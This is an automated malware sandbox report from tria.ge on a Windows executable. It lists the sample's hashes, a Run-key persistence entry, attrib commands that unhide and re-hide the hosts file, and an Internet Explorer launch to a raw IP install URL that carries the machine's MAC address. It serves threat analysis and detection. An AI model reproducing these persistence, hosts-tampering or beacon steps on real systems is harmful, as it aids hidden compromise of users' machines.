Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
268s -
max time network
365s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
06/12/2022, 20:07
Static task
static1
Behavioral task
behavioral1
Sample
b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe
Resource
win10v2004-20221111-en
General
-
Target
b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe
-
Size
383KB
-
MD5
d74fe73f5ea1ee78d0b46b6a2106b028
-
SHA1
a1e4cd6f3fd6610617181de0bce0a44e7ece505c
-
SHA256
b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493
-
SHA512
df50604613b9071e54f8efa7258cb24f674348ac377f90eb3f16ae7aa32451ac4b96e5d47d2e60f6e37f69021c020081d4987efda5fb76b1fdab1c2961b0b2b5
-
SSDEEP
6144:xLuHiunxeEzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzj:5A/zzzzzzzzzzzzzzzzzzzzzzzzzzzzX
Malware Config
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq4862 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe" b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1396 attrib.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\win.ini b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3E8AC0D1-7951-11ED-A1D9-72598884447E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377527531" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe Token: 33 1276 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1276 AUDIODG.EXE Token: 33 1276 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1276 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 1492 iexplore.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1492 iexplore.exe 1492 iexplore.exe 596 IEXPLORE.EXE 596 IEXPLORE.EXE 596 IEXPLORE.EXE 596 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 892 wrote to memory of 1664 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 28 PID 892 wrote to memory of 1664 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 28 PID 892 wrote to memory of 1664 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 28 PID 892 wrote to memory of 1664 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 28 PID 892 wrote to memory of 1396 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 30 PID 892 wrote to memory of 1396 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 30 PID 892 wrote to memory of 1396 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 30 PID 892 wrote to memory of 1396 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 30 PID 892 wrote to memory of 1492 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 32 PID 892 wrote to memory of 1492 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 32 PID 892 wrote to memory of 1492 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 32 PID 892 wrote to memory of 1492 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 32 PID 1492 wrote to memory of 596 1492 iexplore.exe 34 PID 1492 wrote to memory of 596 1492 iexplore.exe 34 PID 1492 wrote to memory of 596 1492 iexplore.exe 34 PID 1492 wrote to memory of 596 1492 iexplore.exe 34 PID 892 wrote to memory of 1252 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 14 PID 892 wrote to memory of 1252 892 b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe 14 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1664 attrib.exe 1396 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe"C:\Users\Admin\AppData\Local\Temp\b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe"2⤵
- Adds policy Run key to start application
- Drops file in Drivers directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\Windows\system32\drivers\etc\hosts"3⤵
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\system32\drivers\etc\hosts"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1396
-
-
C:\program files\internet explorer\iexplore.exe"C:\program files\internet explorer\iexplore.exe" "http://216.98.148.11/htgl/install.asp?ver=090302&tgid=admin666&address=72-59-88-84-44-7E®k=1&flag=fc13c5fef5c681cb0c9a3272aee381cd&frandom=3304"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1492 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:596
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x53c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
601B
MD576b79b99e21d376903a149ee92aec5aa
SHA1a0b98db5c0d9aa15ad0b1384d4ec3f476caa25fb
SHA256f01b96902437791c6caffc41dbf48892f21a7f141651a6de2ebaa9960c15ed37
SHA512b8ae1cc86f6908e9aca2c6714fa1293f6f5dfe8f2c43665a741ad8d31edb1cd328d2568326c9219578ea8a3451663306a1b3301c8c962a745cee2ab2a2b849a6